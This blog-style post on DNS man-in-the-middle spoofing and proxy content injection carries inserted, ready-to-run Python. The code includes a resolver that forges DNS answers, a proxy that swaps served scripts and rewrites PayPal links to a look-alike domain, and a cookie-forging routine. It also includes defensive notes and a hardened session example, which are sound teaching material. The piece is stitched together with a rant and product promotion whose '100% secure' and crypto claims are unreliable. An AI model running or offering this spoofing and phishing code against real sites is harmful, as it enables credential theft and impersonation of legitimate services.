Man-in-the-middle DNS hacks

Proxies are very useful. They can impersonate any kind of server, even a DNS resolver.

Consider this…

Let's say a hacker wanted to modify a foreign domain without touching that domain. Set up a DNS proxy that forwards queries to an upstream resolver (a root server only hands out referrals, not the records themselves), but rewrites the answers for chosen names so they point at a server that mimics the original site by means of a second, content-rewriting proxy.

Now some, but not all, users (those whose machines resolve through the rogue proxy) will hit the spoofed site while believing they are on the real one.

Would this work? For plain DNS it would: nothing in the protocol authenticates an answer, so a client that trusts its resolver trusts whatever the resolver returns. Only DNSSEC validation, encrypted DNS (DoH/DoT) to a trusted resolver, or the TLS certificate check on the spoofed site stand in the way. You gotta love TCP/IP.
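The DNS proxy described above, as an added worked example (this is not code from the original post or from Vyper Logix): a UDP resolver that parses the question, forges an A record for names in a constructed override table, and relays every other query to an upstream recursive resolver. The override name, the address 192.0.2.10 and the upstream resolver are assumptions chosen for illustration.

```python
import socket
import struct

# Constructed override table (hypothetical name and address): queries for these
# names get a forged answer; everything else is forwarded to the real resolver.
OVERRIDES = {"www.example.com.": "192.0.2.10"}
UPSTREAM = ("8.8.8.8", 53)   # assumption: any recursive resolver; root servers
                             # only hand out referrals, not the records themselves


def parse_qname(msg, offset):
    """Decode a label sequence starting at offset; returns (name, next offset)."""
    labels = []
    while True:
        length = msg[offset]
        offset += 1
        if length == 0:
            break
        if length & 0xC0:            # compression pointer: never valid in a query's question
            raise ValueError("unexpected name compression in question")
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels) + ".", offset


def parse_question(msg):
    """Return (id, qname, qtype, qclass, end of question section) for a one-question query."""
    if len(msg) < 12:
        raise ValueError("short DNS message")
    txid, flags, qdcount = struct.unpack("!HHH", msg[:6])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    qname, off = parse_qname(msg, 12)
    qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
    return txid, qname, qtype, qclass, off + 4


def build_query(name, txid=0x1234, qtype=1):
    """Build a minimal A query, so the proxy can be exercised without a client."""
    labels = name.rstrip(".").split(".")
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set
    return header + qname + struct.pack("!HH", qtype, 1)


def build_a_response(query, ip, ttl=60):
    """Answer `query` with one A record for `ip`, echoing its id and question."""
    txid, _, _, _, qend = parse_question(query)
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR, RD, RA; NOERROR
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + socket.inet_aton(ip)
    return header + query[12:qend] + answer


def forward_upstream(query):
    """Relay an unmodified query to the real resolver and return its answer."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(3)
        s.sendto(query, UPSTREAM)
        return s.recv(4096)


def handle_query(query, overrides=OVERRIDES, forward=forward_upstream):
    """Forge an answer for overridden A queries; pass everything else through."""
    _, qname, qtype, qclass, _ = parse_question(query)
    if qtype == 1 and qclass == 1 and qname.lower() in overrides:
        return build_a_response(query, overrides[qname.lower()])
    return forward(query)


def serve(bind=("127.0.0.1", 5353)):
    """Run the proxy; point a test client (dig @127.0.0.1 -p 5353 ...) at it."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.bind(bind)
        while True:
            data, addr = s.recvfrom(4096)
            try:
                s.sendto(handle_query(data), addr)
            except (ValueError, socket.timeout):
                pass


if __name__ == "__main__":
    serve()
```

Only clients that have been pointed at this resolver (by DHCP, a hosts-file change, or a compromised router) are affected, and only for names in the table; a validating stub resolver rejects the unsigned answer for a DNSSEC-signed zone, and the spoofed web server still cannot present a valid certificate for the real name.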

The only remaining question is whether site owners take action to harden their sites or stay in denial about how effective such a low-effort attack can be.

A new hack that can attack any website!

What is Proxy Content Injection?

Use a proxy process to intercept the requests a browser sends to the target website.

Analyze and inspect the returned content, especially the JavaScript files being requested.

Use a tool that allows the incoming content to be replaced on the fly. For instance, a file called xxxxx.js could be replaced by a local copy of that file with some modifications.

The browser then treats the modified content as if it were authentic, allowing the attacker to change specific aspects of how the application behaves.
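The interception step above, as an added worked example (not code from the original post or from Vyper Logix): a plain-HTTP forward proxy that fetches each page, swaps a named script for a local modified copy, rewrites the real domain to a look-alike inside HTML, and fixes the two details that break naive rewriters, gzip-encoded bodies and Content-Length. The paths, the domains and the file ./modified_app.js are assumptions chosen for illustration.

```python
import gzip
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.error import HTTPError
from urllib.parse import urlsplit
from urllib.request import Request, urlopen

# Constructed rules (hypothetical paths and domains, not from any real site):
# swap a served script for a local, modified copy, and rewrite the real domain
# to a look-alike inside HTML so every link keeps the victim on the spoof.
SCRIPT_SWAPS = {"/static/app.js": "./modified_app.js"}  # URL path suffix -> local file
DOMAIN_SWAPS = [(b"paypal.com", b"paypal.net")]         # applied to text/html bodies only


def rewrite_body(path, headers, body, script_swaps=SCRIPT_SWAPS,
                 domain_swaps=DOMAIN_SWAPS, read_file=None):
    """Return (headers, body) after injection, ready to send to the client.

    A gzip body must be inflated before anything can be matched, and
    Content-Length must be recomputed or the browser truncates or hangs
    on the modified body.
    """
    read_file = read_file or (lambda p: open(p, "rb").read())
    headers = {k.lower(): v for k, v in headers.items()}
    if headers.get("content-encoding") == "gzip":
        body = gzip.decompress(body)
        del headers["content-encoding"]          # sent back uncompressed
    for suffix, local in script_swaps.items():
        if path.endswith(suffix):
            body = read_file(local)              # the modified xxxxx.js
    if "text/html" in headers.get("content-type", ""):
        for real, fake in domain_swaps:
            body = body.replace(real, fake)
    headers.pop("transfer-encoding", None)       # body is no longer chunked
    headers["content-length"] = str(len(body))
    return headers, body


class InjectingProxy(BaseHTTPRequestHandler):
    """Plain-HTTP forward proxy: a browser pointed at it sends absolute URLs."""

    def do_GET(self):
        hdrs = {k: v for k, v in self.headers.items() if k.lower() != "proxy-connection"}
        hdrs["Accept-Encoding"] = "gzip"         # never brotli: we can only inflate gzip
        try:
            upstream = urlopen(Request(self.path, headers=hdrs), timeout=10)
        except HTTPError as err:
            upstream = err                       # carries status, headers and body too
        headers, body = rewrite_body(urlsplit(self.path).path,
                                     dict(upstream.headers), upstream.read())
        self.send_response(upstream.code)
        for name, value in headers.items():
            self.send_header(name, value)
        self.end_headers()
        self.wfile.write(body)


def demo():
    """Constructed sample response: a gzip-compressed page linking to the real domain."""
    page = b"<html><a href='https://www.paypal.com/signin'>Log in</a></html>"
    headers = {"Content-Type": "text/html", "Content-Encoding": "gzip"}
    return rewrite_body("/signin", headers, gzip.compress(page), read_file=lambda p: b"")


if __name__ == "__main__":
    print(demo())
    ThreadingHTTPServer(("127.0.0.1", 8080), InjectingProxy).serve_forever()
```

This only sees plain HTTP. For HTTPS the proxy has to answer CONNECT and present its own certificate for the target name, which the browser accepts only if an attacker-controlled CA has been installed on the victim's machine (the model tools like mitmproxy use for testing); otherwise the user gets a certificate warning, which is exactly the check that defeats the attack.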

Practical Application

For instance, let's assume the target site restricts certain material to users who have passed a username/password check, and that the result of that check is stored in a client-side cookie.

The proxy fetches the content. The attacker makes specific changes (to the cookie, or to the JavaScript that reads and sets it) to convince the system that the user is logged in. If the server does not verify the claim against its own records, this works, and the user gains access to areas of the site that should not be accessible.

Any site that trusts the client is vulnerable!

Your bank's mobile banking site is vulnerable if it makes this assumption!

Government sites are vulnerable if they make it!

Sites that make naive assumptions about client-side cookies are vulnerable!

Client-side cookies can easily be read and dissected for clues about how to spoof user access, since everything the browser holds is under the control of whoever controls the browser or the network in front of it!

Whole sites can be spoofed in real time. For instance, PayPal.com can be mirrored as PayPal.net or PayPals.com, where the spoofed site looks exactly like the real one apart from changes that capture user data. What gives it away is the address bar: the look-alike domain cannot present a certificate for the real name.

Much of the Internet is a House of Cards !

Immature and inexperienced developers are being hired left and right by Corporate America. These developers lack the skill and experience to cover all the bases, and they make naive assumptions all the time. It is those assumptions that can be exploited by anyone who gains access to the DOM with the ability to change the content being served.

Corporate America loves to save money by hiring young, inexperienced web developers who cannot grasp the complexities of the Internet. This is where the SQL injection problem came from: inexperienced web developers who lacked the experience to know they were producing flawed systems, while upper management drank the juice and hired yet more of them. SQL injection was always easy to avoid! Just stop building SQL in a way that lets user input become part of the query. For instance, use an ORM (Object Relational Mapper). What's that? Exactly! Most young, inexperienced web developers may know something about SQL but probably know nothing about how to use an ORM. An ORM acts as an insulation layer between the user and the backend database: when application code is not assembling SQL strings itself, user input cannot rewrite the query. The same protection comes from parameterised queries, which is what an ORM uses underneath; an ORM's raw-SQL escape hatch reintroduces the problem if it is fed string-concatenated input.

Corporate America loves to buy into a whole set of ridiculous assumptions and their sites are ripe targets just waiting for someone to come along and build some slick tool that can ride into their backend systems on that same road to hell that is paved by good intentions.

Corporate America is infected with a far more perverse form of malware than any hacker could ever produce. Corporate America is infected with apathy, a lack of trust in its senior developers, and a lack of desire to reward excellence. Corporate America would rather reward sloth and call it excellence than seek out and reward those who are truly excellent at what they do. Why hire one excellent developer when you can just as easily hire two or three inexperienced developers who can do the same job, right? Wrong! One excellent senior developer is worth a dozen inexperienced developers, who cost more in the long run.

Get a grip, you cannot produce secure systems by taking the easy way out !

Security & Fixes

Web developers would have to validate every claim made by a client-side cookie on the server, or stop storing authorization state in cookies altogether in favour of server-side sessions referenced by an opaque, signed session identifier.

Such checks would ensure the user really is logged in, by looking the session up in server-side records, rather than blindly trusting the cookie values.

Other security measures could be developed once tools exist to simulate this level of attack.

Sites could be made harder to attack by delivering logic as Flex or Flash, since that content can be compiled and obfuscated, which raises the effort needed to modify it from the inside. It does not change the underlying problem: any code that runs on the client runs on the attacker's machine and can be decompiled and altered, so the server must still be the only place that decides what a user may do.
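The Practical Application scenario and the fix above, side by side, as an added example (not code from the original post or from Vyper Logix): the vulnerable handler believes a loggedin flag it reads from the cookie, and the forged cookie an attacker's proxy would produce is enough to pass it; the hardened handler issues an opaque session id signed with an HMAC, keeps the user and plan server-side, and rejects any edited cookie. The cookie fields, the user "alice" and the password are constructed for illustration; the HMAC key is assumed to live only on the server.

```python
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie

# --- Vulnerable: the server believes whatever the cookie says ---------------
# Constructed guest cookie, as a proxy would see it in the Cookie: header.
GUEST_COOKIE = "loggedin=0; user=guest; plan=free"


def vulnerable_is_logged_in(cookie_header):
    """Trusts 'loggedin=1' straight out of the cookie: whoever can edit the
    cookie, or the JavaScript that sets it, is 'logged in'."""
    c = SimpleCookie(cookie_header)
    return "loggedin" in c and c["loggedin"].value == "1"


def forge_cookie(cookie_header):
    """What the attacker's proxy does: dissect the cookie and edit the fields."""
    c = SimpleCookie(cookie_header)
    c["loggedin"] = "1"
    c["plan"] = "premium"
    return "; ".join(f"{k}={m.value}" for k, m in c.items())


# --- Hardened: opaque signed session id, all state held server-side ---------
SECRET = secrets.token_bytes(32)   # assumption: per-deployment key, never sent to clients
SESSIONS = {}                      # session id -> server-held state


def _sign(sid):
    return hmac.new(SECRET, sid.encode(), hashlib.sha256).hexdigest()


def login(username, password):
    """Toy credential check (constructed); real code compares a password hash."""
    if (username, password) != ("alice", "correct horse"):
        return None
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": username, "plan": "free"}
    return f"{sid}.{_sign(sid)}"          # value for Set-Cookie: session=...


def hardened_session(cookie_header):
    """Return the server-side session for a validly signed cookie, else None.

    The cookie carries no claims, only an id and its MAC, so editing it (or the
    page's JavaScript) cannot change who the user is or what plan they are on.
    """
    c = SimpleCookie(cookie_header)
    if "session" not in c:
        return None
    sid, _, mac = c["session"].value.rpartition(".")
    if not sid or not hmac.compare_digest(mac, _sign(sid)):
        return None
    return SESSIONS.get(sid)
```

The signature stops the attacker from minting a session id, and keeping plan and user on the server means rewriting app.js to say the user is premium changes only what the page displays, never what the server serves. Mark the cookie HttpOnly and Secure as well, so page scripts cannot read it and it never travels over plain HTTP.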

Stay Tuned

The tools are on the way to help web developers test their sites to make sure their sites are secure from this level of attack.  See Vyper Logix Corp for more and to support their efforts to make these valuable tools available.

Secure Web 2.0 is coming…

Secure Web 2.0

Keeps hackers and crackers from using traditional bots against your site(s).

Eliminates the requirement to use Captcha to ensure the person using your site is really a person.

Uses jQuery.

Runs in the Google Cloud !

Secure Anonymous P2P is coming…

100% Secure … 1024–2048-bit public keys with Blowfish encryption! (Blowfish is a symmetric block cipher with keys of at most 448 bits, so the 1024–2048-bit figure can only describe the key-exchange layer, not the Blowfish cipher itself.)

100% Anonymous … Nobody knows who you are and you never meet anyone you get or share files with.

100% P2P … True Peer to Peer, no middle-man other than Twitter.

This is everything BitTorrent cannot be!

BitTorrent is NOT secure! Transfers are not encrypted by default, so anyone on the path, law enforcement included, can see the files you are sharing or downloading.

BitTorrent is NOT anonymous! Every peer in a swarm sees your IP address, so you can be tracked when using BitTorrent.

Secure Anonymous P2P allows you to search for the files you want to download from those Peers who have the files.

Secure Anonymous P2P uses a Secure VPN that connects both Peers to each other.

Secure Anonymous P2P provides a built-in Twitter blaster that tells the world about your files.

Secure Anonymous P2P has a desktop client and an Android client, both are in the works.
